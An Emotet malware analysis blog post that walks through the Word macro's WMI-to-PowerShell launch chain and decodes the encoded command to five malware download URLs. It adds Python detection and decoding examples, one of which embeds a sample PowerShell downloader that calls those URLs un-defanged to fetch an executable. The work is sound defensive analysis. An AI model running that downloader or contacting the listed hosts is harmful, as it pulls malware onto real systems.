Emotet! (09-16-2019) – Document Analysis


No, not like James Brown, but after a long summer of lounging by the Black Sea, Emotet has started spamming once again. I’ll be working off of this document here.


Using OfficeMalScanner (its info mode dumps the VBA source), we can rip the macros out of the document. We can see the typical Sub autoopen() kicking things off; that is the routine Word runs automatically when the document is opened, so it is where the analysis should start. Looking through the code we can see it creating objects and stitching various variables together.


Opening the document, we can see the new document theme, which is the lure the recipient sees. It's from here that we can step through the macros in the VBA editor and see how they all work together.

While it can be interesting to step through the document, I've explained how to do that on this blog before. I created a stripped-down version where I pulled out the main pieces of code that actually do anything. The “powershell -enco…” string is in green (-enco is one of the abbreviations PowerShell accepts for -EncodedCommand). wpLnXI goes through WMI, which is why WmiPrvSE.exe is what calls up powershell in turn: powershell.exe ends up as a child of WmiPrvSE.exe rather than of Word, so a detection that only looks for Word spawning PowerShell will not see this chain.
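
The launch chain matters for detection: because the macro goes through WMI, powershell.exe's parent is WmiPrvSE.exe, not WINWORD.EXE, and a rule that only looks for Office spawning PowerShell never fires. The check below is an added example, not code from the original post. It runs two such rules over constructed Sysmon-style process-creation records (field names ParentImage, Image and CommandLine; the paths, events and the Base64 placeholder are made up for the demo) and shows which rule catches which chain.

```python
import ntpath

# Constructed Sysmon-style process-creation records for the demo (not real
# telemetry). The Base64 is a placeholder, not an Emotet payload.
SAMPLE_EVENTS = [
    {   # classic chain: Word spawns PowerShell directly
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -enco QQBCAEMA",
    },
    {   # the chain in this post: macro -> WMI -> WmiPrvSE.exe -> PowerShell
        "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -enco QQBCAEMA",
    },
    {   # interactive launch with a different -e... switch; must not match
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1",
    },
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def has_encoded_command(cmdline: str) -> bool:
    """True if the command line carries -EncodedCommand in any spelling
    PowerShell accepts: any prefix of the parameter name (-e, -enc,
    -enco, ...) or the -ec alias. -ExecutionPolicy is not a prefix of
    'encodedcommand', so it does not trigger."""
    for tok in cmdline.split():
        if tok.startswith("-"):
            flag = tok[1:].lower()
            if flag and ("encodedcommand".startswith(flag) or flag == "ec"):
                return True
    return False


def classify(event: dict) -> list:
    """Return the names of the rules that match one process-creation event."""
    parent = ntpath.basename(event["ParentImage"]).lower()
    image = ntpath.basename(event["Image"]).lower()
    hits = []
    # Rule 1: an Office application spawning a script host.
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")
    # Rule 2: the WMI provider host spawning encoded PowerShell. Rule 1 is
    # blind to this chain because the parent is WmiPrvSE.exe, not Word.
    if parent == "wmiprvse.exe" and image == "powershell.exe" and has_encoded_command(event["CommandLine"]):
        hits.append("wmiprvse_spawns_encoded_powershell")
    return hits


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ntpath.basename(ev["ParentImage"]), "->", ntpath.basename(ev["Image"]), classify(ev))
```

Rule 2 insists on the encoded flag because management tooling also launches PowerShell under WmiPrvSE.exe; without that condition the rule is too noisy to be useful.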


So while the macro has changed a bit since last spring, the encoded PowerShell certainly hasn't. Let's decode that Base64 string using CyberChef.


Once again, this is not overly complicated. After you've undone the Base64, use Remove null bytes to clean it up. The nulls are there because -EncodedCommand takes Base64 of UTF-16LE text, so every ASCII character is followed by a 0x00; Decode text with UTF-16LE is the exact inverse and the safer choice if the script ever contains non-ASCII characters, but null stripping works fine here. Split and Extract URLs will complete the job and you ought to be good to go!

hxxp://think1.com/wp-content/upgrade/2na4-4q5g-751619964/
hxxp://broadpeakdefense.com/fbsgf/McZcBMeM/
hxxps://lecairtravels.com/wp-admin/bXwjcdeg/
hxxps://www.biyunhui.com/fj/wbTKndf/
hxxp://nautcoins.com/wp-includes/AcZxFxQ/
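
The same decode the CyberChef recipe performs, as an added example in Python rather than code from the original post. The encoded command is constructed for the demo: a short script that joins the five URLs listed above with '@' (a layout chosen for the sample, not a claim about the real Emotet script), encoded the way -EncodedCommand requires (UTF-16LE, then Base64). The functions pull the Base64 blob off the command line whatever abbreviation of -EncodedCommand was used, decode it as UTF-16LE (the exact inverse, instead of stripping null bytes), and extract and defang the URLs.

```python
import base64
import re

# Constructed stand-in for the macro's encoded script. The five URLs are the
# ones recovered in this post; the surrounding PowerShell is made up for the
# demo and is not the real Emotet downloader.
SAMPLE_SCRIPT = (
    "$u='http://think1.com/wp-content/upgrade/2na4-4q5g-751619964/@"
    "http://broadpeakdefense.com/fbsgf/McZcBMeM/@"
    "https://lecairtravels.com/wp-admin/bXwjcdeg/@"
    "https://www.biyunhui.com/fj/wbTKndf/@"
    "http://nautcoins.com/wp-includes/AcZxFxQ/'.Split('@');"
    "foreach($x in $u){try{(New-Object Net.WebClient).DownloadFile($x,'a.exe');break}catch{}}"
)


def make_encoded_command(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# What the stripped-down macro hands to WMI (constructed from SAMPLE_SCRIPT).
COMMAND_LINE = "powershell -enco " + make_encoded_command(SAMPLE_SCRIPT)


def extract_encoded_blob(command_line: str) -> str:
    """Return the Base64 argument of -EncodedCommand, whichever abbreviation
    was used (-e, -enc, -enco, ... or the -ec alias)."""
    tokens = command_line.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.startswith("-"):
            flag = tok[1:].lower()
            if flag and ("encodedcommand".startswith(flag) or flag == "ec"):
                return tokens[i + 1]
    raise ValueError("no -EncodedCommand argument on the command line")


def decode_encoded_command(blob: str) -> str:
    """Inverse of make_encoded_command. A plain Base64 decode shows a 0x00
    after every character because the text is UTF-16LE; decoding it as
    UTF-16LE is exact, whereas 'Remove null bytes' only works while the
    script is pure ASCII."""
    raw = base64.b64decode(blob)
    if len(raw) % 2 == 0:
        try:
            return raw.decode("utf-16-le")
        except UnicodeDecodeError:
            pass
    # Fallback for malformed input: the CyberChef-style null strip.
    return raw.replace(b"\x00", b"").decode("latin-1")


# Stop at whitespace, quotes, and delimiters such as the '@' used in the
# sample, so each URL comes out without trailing junk.
URL_RE = re.compile(r"https?://[^\s'\"@;,)]+", re.IGNORECASE)


def defang(url: str) -> str:
    """http(s):// -> hxxp(s):// so the indicator cannot be clicked by accident."""
    return url.replace("http", "hxxp", 1)


def extract_urls(script: str) -> list:
    return [defang(u) for u in URL_RE.findall(script)]


def analyse(command_line: str) -> list:
    """Command line -> Base64 blob -> UTF-16LE script -> defanged URL list."""
    return extract_urls(decode_encoded_command(extract_encoded_blob(command_line)))


if __name__ == "__main__":
    for u in analyse(COMMAND_LINE):
        print(u)
```

Run it on a real sample by replacing COMMAND_LINE with the string the macro builds; the only thing the script assumes about the payload is that it was encoded for -EncodedCommand.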

Thanks for reading.
